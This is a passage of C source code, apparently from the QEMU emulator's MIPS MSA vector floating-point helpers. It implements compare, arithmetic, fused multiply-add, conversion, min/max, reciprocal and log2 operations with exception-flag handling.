&(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ule(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fcor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_or(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_une(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ne(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fsor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_or(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_une(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ne(env, pwd, pws, pwt, df, 0, GETPC()); } #define float16_is_zero(ARG) 0 #define float16_is_zero_or_denormal(ARG) 0 #define IS_DENORMAL(ARG, BITS) \ (!float ## BITS ## _is_zero(ARG) \ && float ## BITS ## _is_zero_or_denormal(ARG)) #define MSA_FLOAT_BINOP(DEST, OP, ARG1, ARG2, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, 
BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], add, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], add, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], sub, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], sub, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmul_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], mul, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], mul, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fdiv_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], div, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], div, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_MULADD(DEST, ARG1, ARG2, ARG3, NEGATE, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _muladd(ARG2, ARG3, ARG1, NEGATE, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fmadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], pws->w[i], pwt->w[i], 0, 32); } break; case DF_DOUBLE: for (i = 0; i < 
DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], pws->d[i], pwt->d[i], 0, 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], pws->w[i], pwt->w[i], float_muladd_negate_product, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], pws->d[i], pwt->d[i], float_muladd_negate_product, 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexp2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], scalbn, pws->w[i], pwt->w[i] > 0x200 ? 0x200 : pwt->w[i] < -0x200 ? -0x200 : pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], scalbn, pws->d[i], pwt->d[i] > 0x1000 ? 0x1000 : pwt->d[i] < -0x1000 ? -0x1000 : pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_UNOP(DEST, OP, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fexdo_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. 
*/ flag ieee = 1; MSA_FLOAT_BINOP(Lh(pwx, i), from_float32, pws->w[i], ieee, 16); MSA_FLOAT_BINOP(Rh(pwx, i), from_float32, pwt->w[i], ieee, 16); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(Lw(pwx, i), from_float64, pws->d[i], 32); MSA_FLOAT_UNOP(Rw(pwx, i), from_float64, pwt->d[i], 32); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_UNOP_XD(DEST, OP, ARG, BITS, XBITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## XBITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_ftq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP_XD(Lh(pwx, i), to_q16, pws->w[i], 32, 16); MSA_FLOAT_UNOP_XD(Rh(pwx, i), to_q16, pwt->w[i], 32, 16); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP_XD(Lw(pwx, i), to_q32, pws->d[i], 64, 32); MSA_FLOAT_UNOP_XD(Rw(pwx, i), to_q32, pwt->d[i], 64, 32); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define NUMBER_QNAN_PAIR(ARG1, ARG2, BITS, STATUS) \ !float ## BITS ## _is_any_nan(ARG1) \ && float ## BITS ## _is_quiet_nan(ARG2, STATUS) #define MSA_FLOAT_MAXOP(DEST, OP, ARG1, ARG2, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ c = update_msacsr(env, 0, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) #define FMAXMIN_A(F, G, X, _S, _T, BITS, STATUS) \ do { \ uint## BITS ##_t S = _S, T = _T; \ uint## BITS ##_t as, at, xs, xt, xd; \ if (NUMBER_QNAN_PAIR(S, T, BITS, STATUS)) { \ T = S; \ } \ else if (NUMBER_QNAN_PAIR(T, S, BITS, STATUS)) { \ S = T; \ } \ as = float## BITS ##_abs(S); \ at = float## BITS ##_abs(T); \ MSA_FLOAT_MAXOP(xs, F, S, T, BITS); \ MSA_FLOAT_MAXOP(xt, G, S, T, BITS); \ MSA_FLOAT_MAXOP(xd, F, as, at, BITS); \ X = (as == at || xd == float## BITS ##_abs(xs)) ? 
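/* keep the operand whose magnitude won the absolute-value compare */ \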
xs : xt; \ } while (0) void helper_msa_fmin_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { if (NUMBER_QNAN_PAIR(pws->w[0], pwt->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], min, pws->w[0], pws->w[0], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[0], pws->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], min, pwt->w[0], pwt->w[0], 32); } else { MSA_FLOAT_MAXOP(pwx->w[0], min, pws->w[0], pwt->w[0], 32); } if (NUMBER_QNAN_PAIR(pws->w[1], pwt->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], min, pws->w[1], pws->w[1], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[1], pws->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], min, pwt->w[1], pwt->w[1], 32); } else { MSA_FLOAT_MAXOP(pwx->w[1], min, pws->w[1], pwt->w[1], 32); } if (NUMBER_QNAN_PAIR(pws->w[2], pwt->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], min, pws->w[2], pws->w[2], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[2], pws->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], min, pwt->w[2], pwt->w[2], 32); } else { MSA_FLOAT_MAXOP(pwx->w[2], min, pws->w[2], pwt->w[2], 32); } if (NUMBER_QNAN_PAIR(pws->w[3], pwt->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], min, pws->w[3], pws->w[3], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[3], pws->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], min, pwt->w[3], pwt->w[3], 32); } else { MSA_FLOAT_MAXOP(pwx->w[3], min, pws->w[3], pwt->w[3], 32); } } else if (df == DF_DOUBLE) { if (NUMBER_QNAN_PAIR(pws->d[0], pwt->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], min, pws->d[0], pws->d[0], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[0], pws->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], min, pwt->d[0], pwt->d[0], 64); } else { MSA_FLOAT_MAXOP(pwx->d[0], min, pws->d[0], pwt->d[0], 64); } if (NUMBER_QNAN_PAIR(pws->d[1], pwt->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], min, pws->d[1], pws->d[1], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[1], pws->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], min, pwt->d[1], pwt->d[1], 64); } else { MSA_FLOAT_MAXOP(pwx->d[1], min, pws->d[1], pwt->d[1], 64); } } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmin_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { FMAXMIN_A(min, max, pwx->w[0], pws->w[0], pwt->w[0], 32, status); FMAXMIN_A(min, max, pwx->w[1], pws->w[1], pwt->w[1], 32, status); FMAXMIN_A(min, max, pwx->w[2], pws->w[2], pwt->w[2], 32, status); FMAXMIN_A(min, max, pwx->w[3], pws->w[3], pwt->w[3], 32, status); } else if (df == DF_DOUBLE) { FMAXMIN_A(min, max, pwx->d[0], pws->d[0], pwt->d[0], 64, status); FMAXMIN_A(min, max, pwx->d[1], pws->d[1], pwt->d[1], 64, status); } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmax_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { if 
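/* behaves like IEEE 754-2008 maxNum: a quiet NaN paired with a number yields the number */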
(NUMBER_QNAN_PAIR(pws->w[0], pwt->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], max, pws->w[0], pws->w[0], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[0], pws->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], max, pwt->w[0], pwt->w[0], 32); } else { MSA_FLOAT_MAXOP(pwx->w[0], max, pws->w[0], pwt->w[0], 32); } if (NUMBER_QNAN_PAIR(pws->w[1], pwt->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], max, pws->w[1], pws->w[1], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[1], pws->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], max, pwt->w[1], pwt->w[1], 32); } else { MSA_FLOAT_MAXOP(pwx->w[1], max, pws->w[1], pwt->w[1], 32); } if (NUMBER_QNAN_PAIR(pws->w[2], pwt->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], max, pws->w[2], pws->w[2], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[2], pws->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], max, pwt->w[2], pwt->w[2], 32); } else { MSA_FLOAT_MAXOP(pwx->w[2], max, pws->w[2], pwt->w[2], 32); } if (NUMBER_QNAN_PAIR(pws->w[3], pwt->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], max, pws->w[3], pws->w[3], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[3], pws->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], max, pwt->w[3], pwt->w[3], 32); } else { MSA_FLOAT_MAXOP(pwx->w[3], max, pws->w[3], pwt->w[3], 32); } } else if (df == DF_DOUBLE) { if (NUMBER_QNAN_PAIR(pws->d[0], pwt->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], max, pws->d[0], pws->d[0], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[0], pws->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], max, pwt->d[0], pwt->d[0], 64); } else { MSA_FLOAT_MAXOP(pwx->d[0], max, pws->d[0], pwt->d[0], 64); } if (NUMBER_QNAN_PAIR(pws->d[1], pwt->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], max, pws->d[1], pws->d[1], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[1], pws->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], max, pwt->d[1], pwt->d[1], 64); } else { MSA_FLOAT_MAXOP(pwx->d[1], max, pws->d[1], pwt->d[1], 64); } } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmax_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { FMAXMIN_A(max, min, pwx->w[0], pws->w[0], pwt->w[0], 32, status); FMAXMIN_A(max, min, pwx->w[1], pws->w[1], pwt->w[1], 32, status); FMAXMIN_A(max, min, pwx->w[2], pws->w[2], pwt->w[2], 32, status); FMAXMIN_A(max, min, pwx->w[3], pws->w[3], pwt->w[3], 32, status); } else if (df == DF_DOUBLE) { FMAXMIN_A(max, min, pwx->d[0], pws->d[0], pwt->d[0], 64, status); FMAXMIN_A(max, min, pwx->d[1], pws->d[1], pwt->d[1], 64, status); } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fclass_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { float_status *status = &env->active_tc.msa_fp_status; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); if (df == DF_WORD) { pwd->w[0] = float_class_s(pws->w[0], status); pwd->w[1] = float_class_s(pws->w[1], status); pwd->w[2] = float_class_s(pws->w[2], status); pwd->w[3] = float_class_s(pws->w[3], status); } else if (df == DF_DOUBLE) { pwd->d[0] = float_class_d(pws->d[0], status); pwd->d[1] = float_class_d(pws->d[1], status); } else { assert(0); } } #define MSA_FLOAT_UNOP0(DEST, OP, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, 
status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } else if (float ## BITS ## _is_any_nan(ARG)) { \ DEST = 0; \ } \ } while (0) void helper_msa_ftrunc_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_int32_round_to_zero, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_int64_round_to_zero, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ftrunc_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_uint32_round_to_zero, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_uint64_round_to_zero, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], sqrt, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], sqrt, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_RECIPROCAL(DEST, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## div(FLOAT_ONE ## BITS, ARG, status); \ c = update_msacsr(env, float ## BITS ## _is_infinity(ARG) || \ float ## BITS ## _is_quiet_nan(DEST, status) ? 
\ 0 : RECIPROCAL_INEXACT, \ IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_frsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_RECIPROCAL(pwx->w[i], float32_sqrt(pws->w[i], &env->active_tc.msa_fp_status), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_RECIPROCAL(pwx->d[i], float64_sqrt(pws->d[i], &env->active_tc.msa_fp_status), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_frcp_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_RECIPROCAL(pwx->w[i], pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_RECIPROCAL(pwx->d[i], pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_frint_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], round_to_int, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], round_to_int, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_LOGB(DEST, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ set_float_rounding_mode(float_round_down, status); \ DEST = float ## BITS ## _ ## log2(ARG, status); \ DEST = float ## BITS ## _ ## round_to_int(DEST, status); \ set_float_rounding_mode(ieee_rm[(env->active_tc.msacsr & \ MSACSR_RM_MASK) >> MSACSR_RM], \ status); \ \ set_float_exception_flags(get_float_exception_flags(status) & \ (~float_flag_inexact), \ status); \ \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_flog2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_LOGB(pwx->w[i], pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_LOGB(pwx->d[i], pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexupl_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = 